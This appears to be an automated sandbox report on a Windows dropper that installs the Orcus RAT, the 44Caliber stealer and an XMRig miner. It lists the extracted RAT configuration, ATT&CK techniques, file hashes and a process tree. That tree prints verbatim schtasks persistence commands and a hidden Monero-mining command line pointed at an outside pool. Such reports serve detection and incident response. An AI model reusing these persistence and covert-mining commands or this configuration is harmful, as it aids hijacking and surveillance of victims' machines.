44caliber | f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
12-02-2024 01:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe
Size

2.9MB
MD5

795cad191a335ac30addd0c963bd6517
SHA1

c1c36d77734f105b62bcb662c4ee5bfe68377e33
SHA256

f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126
SHA512

a3ae9f8035c366cd5c8dc3d765447517d88245e189844d5eb25e1a2e75af5638ada69f2e313594224bdc8f970b9288e9912c22c1067bd044154509a9b8ca6bb8
SSDEEP

49152:Dyu3MbyTrWLL98QIhidAWs1885v01ashxTFUkXZZifVYDkEmCq+XOue/suKiFGjr:DNMGTtgdA/8hXzZQfVYQE8+J0KiAS8

Score

10^/10

44caliber orcus xmrig miner rat spyware stealer

Malware Config

Extracted

Family

orcus

192.168.0.200:10134

Mutex

afa5401f54984aaa863b79961927d3dd

Attributes

autostart_method
TaskScheduler
enable_keylogger
false
install_path
%programfiles%\Orcus\Orcus.exe
reconnect_delay
10000
registry_keyname
Orcus
taskscheduler_taskname
GitHub
watchdog_path
Temp\nurik.exe

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus

Orcus main payload 5 IoCs

resource	yara_rule
behavioral2/files/0x000600000002320d-4.dat	family_orcus
behavioral2/files/0x000600000002320d-5.dat	family_orcus
behavioral2/files/0x000600000002323a-229.dat	family_orcus
behavioral2/files/0x000600000002323a-249.dat	family_orcus
behavioral2/files/0x000600000002323a-253.dat	family_orcus

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Orcurs Rat Executable 6 IoCs

resource	yara_rule
behavioral2/files/0x000600000002320d-4.dat	orcus
behavioral2/files/0x000600000002320d-5.dat	orcus
behavioral2/files/0x000600000002323a-229.dat	orcus
behavioral2/files/0x000600000002323a-249.dat	orcus
behavioral2/memory/3608-259-0x0000000000D60000-0x0000000000E4E000-memory.dmp	orcus
behavioral2/files/0x000600000002323a-253.dat	orcus

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/1872-317-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-318-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-320-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-325-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-326-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-327-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-328-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-329-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-330-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-331-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-332-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/1872-333-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	nurik.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	nursultan_client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	oboxd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	Image-O.gpj.scr
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	Services.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	Orcus.exe

Executes dropped EXE 12 IoCs

pid	Process
3516	Image-O.gpj.scr
1204	nursultan_client.exe
2720	nurik.exe
4952	oboxd.exe
3512	WindowsInput.exe
3944	WindowsInput.exe
3608	Orcus.exe
2824	sihost64.exe
2540	Services.exe
2820	nurik.exe
4056	nurik.exe
1772	sihost64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File created	C:\Windows\assembly\Desktop.ini	Image-O.gpj.scr
File opened for modification	C:\Windows\assembly\Desktop.ini	Image-O.gpj.scr

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
41	pastebin.com
42	pastebin.com
43	raw.githubusercontent.com
44	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	freegeoip.app
9	freegeoip.app

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\WindowsInput.InstallState	WindowsInput.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe	Image-O.gpj.scr
File created	C:\Windows\SysWOW64\WindowsInput.exe.config	Image-O.gpj.scr

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2540 set thread context of 1872	2540	Services.exe	113

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\Orcus\Orcus.exe	Image-O.gpj.scr
File opened for modification	C:\Program Files\Orcus\Orcus.exe	Image-O.gpj.scr
File created	C:\Program Files\Orcus\Orcus.exe.config	Image-O.gpj.scr

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\assembly	Image-O.gpj.scr
File created	C:\Windows\assembly\Desktop.ini	Image-O.gpj.scr
File opened for modification	C:\Windows\assembly\Desktop.ini	Image-O.gpj.scr

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	nurik.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	nurik.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
636	schtasks.exe
3128	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2720	nurik.exe
2720	nurik.exe
2720	nurik.exe
2720	nurik.exe
4952	oboxd.exe
4952	oboxd.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
2540	Services.exe
3608	Orcus.exe
4056	nurik.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
2540	Services.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
3608	Orcus.exe
4056	nurik.exe
4056	nurik.exe
3608	Orcus.exe
4056	nurik.exe
3608	Orcus.exe
4056	nurik.exe
3608	Orcus.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
672	Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	nurik.exe
Token: SeDebugPrivilege	4952	oboxd.exe
Token: SeDebugPrivilege	3608	Orcus.exe
Token: SeDebugPrivilege	2540	Services.exe
Token: SeDebugPrivilege	2820	nurik.exe
Token: SeDebugPrivilege	4056	nurik.exe
Token: SeLockMemoryPrivilege	1872	explorer.exe
Token: SeLockMemoryPrivilege	1872	explorer.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1640 wrote to memory of 3516	1640	f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe	84
PID 1640 wrote to memory of 3516	1640	f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe	84
PID 1640 wrote to memory of 1204	1640	f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe	85
PID 1640 wrote to memory of 1204	1640	f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe	85
PID 1640 wrote to memory of 1204	1640	f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe	85
PID 1204 wrote to memory of 2720	1204	nursultan_client.exe	87
PID 1204 wrote to memory of 2720	1204	nursultan_client.exe	87
PID 1204 wrote to memory of 4952	1204	nursultan_client.exe	86
PID 1204 wrote to memory of 4952	1204	nursultan_client.exe	86
PID 4952 wrote to memory of 4268	4952	oboxd.exe	88
PID 4952 wrote to memory of 4268	4952	oboxd.exe	88
PID 4268 wrote to memory of 636	4268	cmd.exe	90
PID 4268 wrote to memory of 636	4268	cmd.exe	90
PID 3516 wrote to memory of 1188	3516	Image-O.gpj.scr	92
PID 3516 wrote to memory of 1188	3516	Image-O.gpj.scr	92
PID 1188 wrote to memory of 1344	1188	csc.exe	94
PID 1188 wrote to memory of 1344	1188	csc.exe	94
PID 3516 wrote to memory of 3512	3516	Image-O.gpj.scr	97
PID 3516 wrote to memory of 3512	3516	Image-O.gpj.scr	97
PID 4952 wrote to memory of 2824	4952	oboxd.exe	101
PID 4952 wrote to memory of 2824	4952	oboxd.exe	101
PID 3516 wrote to memory of 3608	3516	Image-O.gpj.scr	100
PID 3516 wrote to memory of 3608	3516	Image-O.gpj.scr	100
PID 4952 wrote to memory of 2540	4952	oboxd.exe	102
PID 4952 wrote to memory of 2540	4952	oboxd.exe	102
PID 2540 wrote to memory of 3760	2540	Services.exe	103
PID 2540 wrote to memory of 3760	2540	Services.exe	103
PID 3760 wrote to memory of 3128	3760	cmd.exe	106
PID 3760 wrote to memory of 3128	3760	cmd.exe	106
PID 3608 wrote to memory of 2820	3608	Orcus.exe	109
PID 3608 wrote to memory of 2820	3608	Orcus.exe	109
PID 3608 wrote to memory of 2820	3608	Orcus.exe	109
PID 2820 wrote to memory of 4056	2820	nurik.exe	110
PID 2820 wrote to memory of 4056	2820	nurik.exe	110
PID 2820 wrote to memory of 4056	2820	nurik.exe	110
PID 2540 wrote to memory of 1772	2540	Services.exe	112
PID 2540 wrote to memory of 1772	2540	Services.exe	112
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113
PID 2540 wrote to memory of 1872	2540	Services.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe
"C:\Users\Admin\AppData\Local\Temp\f6649b36f8f7cc9680e319e715291358d5ee4ed3eafd739b53ab8fed3fee5126.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1640
- C:\Users\Admin\AppData\Local\Temp\Image-O.gpj.scr
  "C:\Users\Admin\AppData\Local\Temp\Image-O.gpj.scr" /S
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\olkn7wjw.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1188
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB04.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBB03.tmp"
      4⤵
      PID:1344
- - C:\Windows\SysWOW64\WindowsInput.exe
    "C:\Windows\SysWOW64\WindowsInput.exe" --install
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:3512
- - C:\Program Files\Orcus\Orcus.exe
    "C:\Program Files\Orcus\Orcus.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Users\Admin\AppData\Local\Temp\nurik.exe
      "C:\Users\Admin\AppData\Local\Temp\nurik.exe" /launchSelfAndExit "C:\Program Files\Orcus\Orcus.exe" 3608
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2820
    - - C:\Users\Admin\AppData\Local\Temp\nurik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nurik.exe" /watchProcess "C:\Program Files\Orcus\Orcus.exe" 3608
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4056
- C:\Users\Admin\AppData\Local\Temp\nursultan_client.exe
  "C:\Users\Admin\AppData\Local\Temp\nursultan_client.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1204
- - C:\Users\Admin\AppData\Local\Temp\oboxd.exe
    "C:\Users\Admin\AppData\Local\Temp\oboxd.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4952
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4268
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:636
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2540
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3760
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:3128
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        Executes dropped EXE
        
        PID:1772
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7144275 --pass= --cpu-max-threads-hint=60 --donate-level=5 --unam-idle-wait=1 --unam-idle-cpu=80
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1872
- - C:\Users\Admin\AppData\Local\Temp\nurik.exe
    "C:\Users\Admin\AppData\Local\Temp\nurik.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2720

C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe"
1⤵
- Executes dropped EXE
PID:3944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Orcus\Orcus.exe

Filesize
2.2MB

MD5
b67adc101d04dbf15eea6f363651f5e1

SHA1
df8a5f99461f8f57d5018557a0f849df5604473e

SHA256
5d923862417c55fe4a2360628653aa3384aadf4d6b6fcb5f0bf2855a862ec818

SHA512
9095b5ba9945ece9a8bd9240a32c12efceb80f1082afe7e6a58e40db63016bbe7eb5812f8259fdd13a1ac9388b12df2a05004a7a8a275ba15e2ef5ce48b33ee9

Download Submit
C:\Program Files\Orcus\Orcus.exe

Filesize
448KB

MD5
ba13160c87dffbfc0609d92caa6c61ef

SHA1
7c9d2a96b1429312891f6f754848314219f3f76e

SHA256
e2be337d8fcfc90cff8c6b331156d01fab7a1f67f6172a7e0dad2f15d30a5ae5

SHA512
e4b03661067bc4bf7a75ef8ebf2cbbddee40dd721125c2af9fde538b41fe52333487633f4bfb3d5c188008084fa93419bdf916d5cef616e1d5a3e4777b0750ec

Download Submit
C:\Program Files\Orcus\Orcus.exe

Filesize
4.2MB

MD5
c30226f56ae3b4cd520257c2cb01499b

SHA1
dccd02c6b7ce561d12ed5425a3db572abf239b29

SHA256
a52b6b771355c0191449227fef4995510c4977511c1a94d178c1c20b277b4caa

SHA512
e0629d8daf4e312c01641b2fd5dbb8db38b88f044440cb088f4a0ed7a968b9659498468900ec32978a6b380f1c10973f3b9aae3befbc49d65d64a0e8e0ff670c

Download Submit
C:\ProgramData\88\Process.txt

Filesize
1KB

MD5
82adce7bc86164157756d3f25a5b8fb0

SHA1
11445b329a0543cbc37ca7e49a98da7255b873e9

SHA256
e3555f02e03fad1b0ec36c58296d8f114925b6c96d30bf48dde5dbfb0dc018e2

SHA512
8d36facb91ef15991db2dd88d616e73d628ae1b2ad18369243755a908c99e2cfeae9ed8fb3938f9f5c4109b3e486f4df706ad1a2484f72ffbd0c5400a18b77f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nurik.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Image-O.gpj.scr

Filesize
2.4MB

MD5
89980bbb1c8e70521a59d8ee938a04c5

SHA1
82430c9b70e3e6ddd2947b1ec6d6f02edf4234b2

SHA256
e09776b5e7f3c8493c2dbea9260fa1746babec54b30373f77aafb070ddcfabe9

SHA512
37fa35f821c16950c5df797d9f090975d442034a447fd23c47beb918bebcfa2c432bf461baadd08a372258d435d2fefb7f256e12d4d001845998cb88dc7e5c62

Download Submit
C:\Users\Admin\AppData\Local\Temp\Image-O.gpj.scr

Filesize
2.6MB

MD5
ecd1edcab6637a0bcd8a937871a4360e

SHA1
80c8197bc78c6fe02877d695377cdafdf9c93263

SHA256
d60eb8ff38cccf304f9d74e93fd3fe8018df37ab28140d01385d844e2b270743

SHA512
3799ee470af091a17d73f430477bfe91b891f81d055257bc8adfbd687ef14120ed2d583deb7455314f09b3617499537a5b834aeb4657da2b81adfa400f0c0fe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBB04.tmp

Filesize
1KB

MD5
c698cf7a10503f93ddd162f487ccd76d

SHA1
9bcc571be58bb3e6e8d53300f6aef2b3049d6d27

SHA256
47d3272959f49d58c10712deb807b281338fcec55f2e267abce07aa3fa1afe23

SHA512
bb4562dea15ee7800eef4979dcaf51bc18602982482aaa3075f77c45cfb92ff60e60276fa878944580a14a8900e4b2eafcad2a04b445ee78f1a8ae9e7369f2eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
2.0MB

MD5
d6400969781f7d6c38525f60e5b4d410

SHA1
ec70f779fa55ab1fc0065a602e4d95079e417343

SHA256
295d40b979b51e0ffc828004004422d390512438d6d70f61e1c6bfe87aabd74d

SHA512
3bfaf42fedec60704f557aa01e2fcfcdc5513d30bcd449b0ff0504d6084578bfd7f6624341cd534fa10e517e3d641485a2c5453cdcab269c7784e5dd425b7818

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
694KB

MD5
5b6f6aedadefb669fa3f32b27f0cce3a

SHA1
3e3ab3de191e203e275437327a322afe74c4c2f0

SHA256
6acc2cd91db6b31124933b91a69f720e28ef8c09982928baf3efe1db976a23a6

SHA512
8d68ebd3afc641b6a93151c5ec4ecde48a4af1088a5eddd0d040e096aeaca7f71c8f91af7fc7096f801fe95e0f3f3218191cdcbe9c911c87cf7b8ad97ec532d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nurik.exe

Filesize
274KB

MD5
7e3bc7b8a8b9a60ef978ed4e947ce915

SHA1
993627e075a124810c4f75074c7b28f9931c20e4

SHA256
07db8c1b6e027058c9e1e569ab0b2df5047085a3c85c78ee1535c421009b2a9a

SHA512
0ddeaed7358de529e28457067157dc576d289c83bf02d64e0398ee6718ce3ece7eae96cfbaa2641a0aaf819952b8d6d5cd6aa88c1cc2c4374b2a8edc5aef6cb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\nurik.exe

Filesize
9KB

MD5
913967b216326e36a08010fb70f9dba3

SHA1
7b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf

SHA256
8d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a

SHA512
c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33

Download Submit
C:\Users\Admin\AppData\Local\Temp\nursultan_client.exe

Filesize
2.2MB

MD5
eb6fa00cbd1f7ac6494ad51aa7bfbb9a

SHA1
0b9ae215ca6a03386a62c63d849fee31c5c03392

SHA256
82b2f29746562b6840f1bc2050143de2157362d40a34e4886a9619d8f5846edf

SHA512
a46b4bc13fc585bbc3352d17eeb52bbbd534ef3aa7762ec5982b07caad994da2a07879edc3a176501dd445353aa7c49c3d0336275a0e0b5dfde7713563cac479

Download Submit
C:\Users\Admin\AppData\Local\Temp\nursultan_client.exe

Filesize
1.7MB

MD5
138c81a4f99580a2e4b352a8772e03cc

SHA1
3baf0d761edbca2a7a0e25048861410efcc00386

SHA256
776bb612c9fb9a38db5e0057f3812a828ef161f2df82693c48839c0525e040a8

SHA512
523f513b15e4a219a86c8187f6ad53bc035895dfdfd4d0a25981270a9000d89272718c25614fe251c6560616e730c18da78e492f1b2f85a3ab51a526bb1c00dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\oboxd.exe

Filesize
1.8MB

MD5
eeabb1d17f8d3672f38e208501bef313

SHA1
2dcd6a66b45c66f5114ea5d0958f58c0c3d332cd

SHA256
1790a07a188b287c9f9adb31c022e1da821cc0316b495d4f9cc145c1b1bca18b

SHA512
758091a5477e7a36ce92fa48f783967e98c23366b36f2e2f6e8c0fb2a90faccfca930cbd4eaa1409c5992f139cbd82c38f9f76e1ef1414b5ae238f4bae724220

Download Submit
C:\Users\Admin\AppData\Local\Temp\oboxd.exe

Filesize
832KB

MD5
285670fad80f68ef8c8ddb6f76e9725d

SHA1
a1a1aee589e7811fe4b66e6500ccd319e054dd63

SHA256
83c6f28edec1019bab3f86ae47910924eef989fd89b7af79b9316f1854ef8094

SHA512
5b0826aceb54b85d8e302300f12bf83cb1b1c367d99a3527a7f32b1acbf7db7a0d73b7dfcb55c3f62da47a7b82ac7cddb5383a678cd78028460706a7c107b026

Download Submit
C:\Users\Admin\AppData\Local\Temp\oboxd.exe

Filesize
640KB

MD5
671f9a84cce052f9a21b3317b92d2f58

SHA1
e3410fd67c9c46555a2ff2260671e9b4e08cd8b9

SHA256
79fc4aa66b3c43ca31c179aa3851fc6e8ffb3b04e78f586fc07e411e6b9eab68

SHA512
866e73c1d159a0d10701d5a92d65452a546128fe6832222ed58082fa23f4f90bdefee47812d951c559f761575fb20d4705a7747170f4913e3dc21e23759e33af

Download Submit
C:\Users\Admin\AppData\Local\Temp\olkn7wjw.dll

Filesize
76KB

MD5
4454953f1cdac5b8c52c296b61e0428d

SHA1
12d6b92809def9245f479ffae5d4060406cd8812

SHA256
7497b8b46a2f332118b14a1578718cd00a98203594a223e228a0f8bbadc70a50

SHA512
2db7c414b8d8ee3e79f97af31f6fbae5e242c47547d1ff3352488935f841645580f8be8c42e1b4d73d9b06c9cd534cfc7d537da47c8e80ee724f3245a7c5177c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
911b19c708c9cec64ae903c37bbc130a

SHA1
4819de5bfd0f38fe7aeea41b20ed3c2dcb46e98b

SHA256
be55e2c26a1d438d3ca1b11619f1ce6f1e1bf0a97b754096de2d2e2dd51cbb6c

SHA512
d754c217d00cdc7b179a4901cd856ce3a863fd281bae4b1cc42f0a66167ecc2ac7a6b808fa5e40f7cbc6058023bb75fbcbd5baff5d9e2d8227cd5066864a4451

Download Submit
C:\Users\Admin\AppData\Roaming\Orcus\err_afa5401f54984aaa863b79961927d3dd.dat

Filesize
1KB

MD5
f94755b085888b5a9b16001daf26ac0a

SHA1
cbf9c455e883935e7dd76d79bcd7dad21a37776c

SHA256
884452c104a33f7aaa840127baa1c9a9f06845c2e9f6a5e48fcbdfae5de147ec

SHA512
c22ef2efd6f339bbef6512add2f9bc34b6669d74a61b14a56a3fca6a51de484dc16779558391757c08fd42132ca36791f2239baead991da0dc369efc5cb1d9be

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe

Filesize
21KB

MD5
e6fcf516d8ed8d0d4427f86e08d0d435

SHA1
c7691731583ab7890086635cb7f3e4c22ca5e409

SHA256
8dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337

SHA512
